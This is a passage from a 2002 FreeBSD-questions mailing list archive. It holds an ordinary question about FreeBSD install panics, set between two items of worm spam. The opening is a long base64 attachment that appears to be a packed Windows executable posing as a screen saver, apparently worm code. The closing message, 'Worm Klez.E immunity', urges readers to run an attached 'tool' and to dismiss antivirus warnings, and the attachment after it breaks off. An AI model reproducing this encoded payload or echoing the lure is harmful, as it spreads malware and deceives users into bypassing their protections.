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 +IDr6AHwiQeDxwWJ2OLZjb4AIAEAiwcJwHRFi18EjYQwGEcBAAHzUIPHCP+WuEcBAJWKB0cIwHTc ifl5Bw+3B0dQR7lXSPKuVf+WvEcBAAnAdAeJA4PDBOvY/5bARwEAYek7Hf//AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAwAAACgAAIAOAAAAaAAAgBAAAACoAACAAAAAAAAAAAAA AAAAAAABAAEAAABAAACAAAAAAAAAAAAAAAAAAAABAAkEAABYAAAA7FABAOgCAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAQBsAAAAgAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAAmAAAANhTAQAUAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAMAAAIAAAAAAAAAAAAAAAAAAAAEACQQAANgAAADwUwEA KAMAAAAAAAAAAAAAGCQBACgAAAAgAAAAQAAAAAEABAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA/wD/AP// AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAPoAAAAAAAAAAAAAAAAAAAD6AAAAAAAAAAAAAAAAAAAPqqAAAAAAAAAAAAAAAAAAD6qgAAAA AAAAAAAAAAAAAPqqqgAAAAAAAAAAAAAAAAD6qqoAAAAAAAAAAAAAAAAPqqqqoAAAAAAAAAAAAAAA +qqqqqoAAAAAAAAAAAAAD6qqqqqqoAAAAAAAAAAAAA+qqqqqqqAAAAAAAAAAAAD6qqqqqqqqAAAA AAAAAAAPqqqqqqqqqqAAAAAAAAAA+qqqqqqqqqqqAAAAAAAAD6qqqqqqqqqqqqAAAAAAAPqqqqqq qqqqqqqqAAAAAAD6qqqqqqqqqqqqqgAAAAAPqqqqqqqqqqqqqqqgAAAAD6qqqqqqqqqqqqqqoAAA APqqqqqqqqqqqqqqqqoAAAD6qqqqqqqvqqqqqqqqAAAA+qqqqqqqAPqqqqqqqgAAAPqqqqqqqgD6 qqqqqqoAAAAPqqqqqqAAD6qqqqqgAAAAD6qqqqqgAA+qqqqqoAAAAAD/qqqqAAAA/6qqqgAAAAAA AP///wAAAAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAD//////////////////H////x////4P///+D////Af///wH///4A///8AH//+AA///gAP/ /wAB//4AAP/8AAB/+AAAP/AAAB/wAAAf4AAAD+AAAA/AAAAHwAAAB8ABAAfAAQAH4AOAD+ADgA/w B8Af/A/wP////////////////wAnAQAAAAEAAQAgIBAAAQAEAOgCAAABAPAgAQAoAzQAAABWAFMA XwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAUAAgAAAAAABQACAAAAPwAA AAAAAAAEAAQAAQAAAAAAAAAAAAAAAAAAAIgCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYA bwAAAGQCAAABADAANAAwADkAMAA0AGIAMAAAADIADQABAEMAbwBtAG0AZQBuAHQAcwAAAFMAYwBy AGUAZQBuACAAUwBhAHYAZQByAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAHcA dwB3AC4AcwBjAHIAZQBlAG4AcwBhAHYAZQByAC4AYwBvAG0AAABCAA0AAQBGAGkAbABlAEQAZQBz AGMAcgBpAHAAdABpAG8AbgAAAAAAUwBjAHIAZQBlAG4AIABTAGEAdgBlAHIAAAAAADYACwABAEYA aQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAsACAAMAAsACAAMAAsACAAMgAAAAAAIAAAAAEASQBu AHQAZQByAG4AYQBsAE4AYQBtAGUAAABGABEAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAyADAAMAAyAAAAAAAoAAAAAQBMAGUAZwBhAGwAVABy AGEAZABlAG0AYQByAGsAcwAAAAAAKAAAAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0A ZQAAACAAAAABAFAAcgBpAHYAYQB0AGUAQgB1AGkAbABkAAAAIAAAAAEAUAByAG8AZAB1AGMAdABO AGEAbQBlAAAAAAA6AAsAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAA1ACwAIAAwACwA IAAwACwAIAAyAAAAAAAgAAAAAQBTAHAAZQBjAGkAYQBsAEIAdQBpAGwAZAAAAEQAAAABAFYAYQBy AEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBLAE AAAAAAAAAAAAAAAA+FcBALhXAQAAAAAAAAAAAAAAAAAFWAEAyFcBAAAAAAAAAAAAAAAAABJYAQDQ VwEAAAAAAAAAAAAAAAAAHFgBANhXAQAAAAAAAAAAAAAAAAAkWAEA4FcBAAAAAAAAAAAAAAAAAC9Y AQDoVwEAAAAAAAAAAAAAAAAAO1gBAPBXAQAAAAAAAAAAAAAAAAAAAAAAAAAAAEZYAQBUWAEAZFgB AAAAAAByWAEAAAAAAIBYAQAAAAAAiFgBAAAAAACYWAEAAAAAAKBYAQAAAAAAdAAAgAAAAABLRVJO RUwzMi5ETEwAQURWQVBJMzIuZGxsAEdESTMyLmRsbABNUFIuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAEV4aXRQcm9j ZXNzAAAAUmVnQ2xvc2VLZXkAAABCaXRCbHQAAFdOZXRDbG9zZUVudW0AAABHZXREQwAAAEludGVy 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 --onlqqjc-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 17:35:31 2002 Delivered-To: freebsd-questions@freebsd.org Received: from public.wh.hb.cn (mail2.wh.hb.cn [202.103.0.113]) by hub.freebsd.org (Postfix) with ESMTP id 8AB6837B404 for ; Tue, 25 Jun 2002 17:35:04 -0700 (PDT) Received: from RavProxy ([61.183.74.135]) by public.wh.hb.cn (Sun Internet Mail Server sims.4.0.2001.07.26.11.50.p9) with ESMTPA id <0GYA008GDF0WBM@public.wh.hb.cn> for freebsd-questions@FreeBSD.ORG; Wed, 26 Jun 2002 08:36:33 +0800 (CST) Date: Wed, 26 Jun 2002 08:34:50 +0800 From: =?utf-8?B?5p2o5YuH5pm6?= Subject: Problem on installing FreeBSD 4.5-RELEASE To: freebsd-questions@FreeBSD.ORG Message-id: <000101c21ca9$4865d840$050710ac@heos.com> Organization: =?utf-8?B?5q2m5rGJ5Y2O5LmL5rSL5YWJ55S157O757uf5pyJ6ZmQ6LSj5Lu75YWs5Y+4?= MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Mailer: Microsoft Outlook, Build 10.0.2627 Content-type: text/plain; charset=utf-8 Content-transfer-encoding: quoted-printable Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG My computer's hardware are shown below:=20 CPU: Celeron 400MHz=20 Chipset: VIA VT82C691 + VT82C586B=20 BIOS: Award (1998)=20 Hard Disk: Maxtor 4D040H2 (40GB IDE)=20 Memory: 2*128MB SDRAM=20 At first, the BIOS couldn't recognize the new Maxtor Disk. I upgraded it = to 2001,=20 and it worked. I planned to partition the disk as follow:=20 Primary Partition 1: 7.2GB, FAT32, (ad0s1), Windows XP Pro=20 Primary Partition 2: 4.0GB, UFS, ad0s3, FreeBSD ad0s3a, 3840MB, mount as / ad0s3b, 256MB, swap Extended Partition: (ad0s2), Logical Disk 1 and 2: NTFS, Windows XP = Pro I setup Windows XP first, and install System Commander 7.04 as the boot = manager.=20 During the installation of FreeBSD 4.5-RELEASE, when the system is = making the=20 /dev/ad0s3a, I see warning messages from virtual terminal 2:=20 Warning: Block size and bytes per inode restrict cylinders per group = to 89.=20 Warning: inode blocks/cyl group (171) >=3D data blocks (64) in last = cylinder=20 group. This implies 2048 sector(s) can't be allocated.=20 ...=20 During the format process, I see following messages showing frequently:=20 ad0: WRITE command timeout tag=3D0 serv=3D0 - resetting=20 ata0: resetting devices ... done=20 After file system was made, the above messages still show intermittently = during the file copy process. Finally, system shows something like this and = reboot:=20 Fatal trap 12: page fault while in kernel mode=20 fault virtual address =3D ...=20 fault code / supervisor write, page not present=20 instruction pointer =3D ...=20 stack pointer =3D ...=20 frame pointer =3D ...=20 code segment =3D ...=20 =3D ...=20 processor eflags =3D ...=20 current process =3D ...=20 interrupt mask =3D ...=20 trap number =3D 12=20 panic: page fault=20 Or something like this:=20 panic: syncing disk ...=20 I then change the disk slices as follow:=20 / =3D 128MB swap =3D 256MB /var =3D 384MB /tmp =3D 256MB /usr =3D every thing else But the system still don't work.=20 After several times of defeat, I try to install FreeBSD 3.4-STABLE = instead, which uses=20 wd driver for hard disks. Except the following warning message, nothing = went wrong -- the installation has been completely successful:=20 Warning: the last 2048 sector(s) can=C2=A1=C2=AFt be allocated.=20 What's the problem?=20 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 17:36: 3 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mx0.ecxnetwork.net (mx0.ecxnetwork.net [208.144.33.2]) by hub.freebsd.org (Postfix) with ESMTP id 105E237B401 for ; Tue, 25 Jun 2002 17:35:15 -0700 (PDT) Received: from websense.ecx.com (mail.ecx.com [208.144.33.135]) by mx0.ecxnetwork.net (8.11.3/8.11.3) with SMTP id g5PNhVi49182 for ; Tue, 25 Jun 2002 16:43:32 -0700 (PDT) (envelope-from info@ecx.com) Date: Tue, 25 Jun 2002 16:43:32 -0700 (PDT) Message-Id: <200206252343.g5PNhVi49182@mx0.ecxnetwork.net> Received: (from Dradql [66.27.10.183]) by websense.ecx.com (NAVGW 2.5.1.18) with SMTP id M2002062517333029972 for ; Tue, 25 Jun 2002 17:33:31 -0700 From: info To: questions@FreeBSD.org Subject: Worm Klez.E immunity MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=R14i5x3r9Q04VxeszI23K5c8Vsdk44Ty79V Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --R14i5x3r9Q04VxeszI23K5c8Vsdk44Ty79V Content-Type: text/html; Content-Transfer-Encoding: quoted-printable Klez.E is the most common world-wide spreading worm.It's very dangerous by corrupting your files.
Because of its very smart stealth and anti-anti-virus technic,most common AV software can't detect or clean it.
We developed this free immunity tool to defeat the malicious virus.
You only need to run this tool once,and then Klez will never come into your PC.
NOTE: Because this tool acts as a fake Klez to fool the real worm,some AV monitor maybe cry when you run it.
If so,Ignore the warning,and select 'continue'.
If you have any question,please mail to me.
--R14i5x3r9Q04VxeszI23K5c8Vsdk44Ty79V Content-Type: text/plain; name="DELETED0.TXT" Content-Transfer-Encoding: base64 Content-ID: RmlsZSBhdHRhY2htZW50OiBOQU1FLmJhdA0KDQpUaGUgZmlsZSBhdHRhY2hlZCB0byB0aGlz IGVtYWlsIHdhcyByZW1vdmVkIGJlY2F1c2UgZmlsZXMgb2YgdGhpcyB0eXBlIGFyZSBub3Qg YWNjZXB0ZWQgZm9yIGRlbGl2ZXJ5IGJ5IHlvdXIgZW1haWwgZ2F0ZXdheS4NCg== --R14i5x3r9Q04VxeszI23K5c8Vsdk44Ty79V Content-Type: application/octet-stream; name=misc[1].htm Content-Transfer-Encoding: base64 Content-ID: PEhUTUw+PEhFQUQ+PE1FVEEgSFRUUC1FUVVJVj0iQ29udGVudC1UeXBlIiBDT05URU5UPSJ0 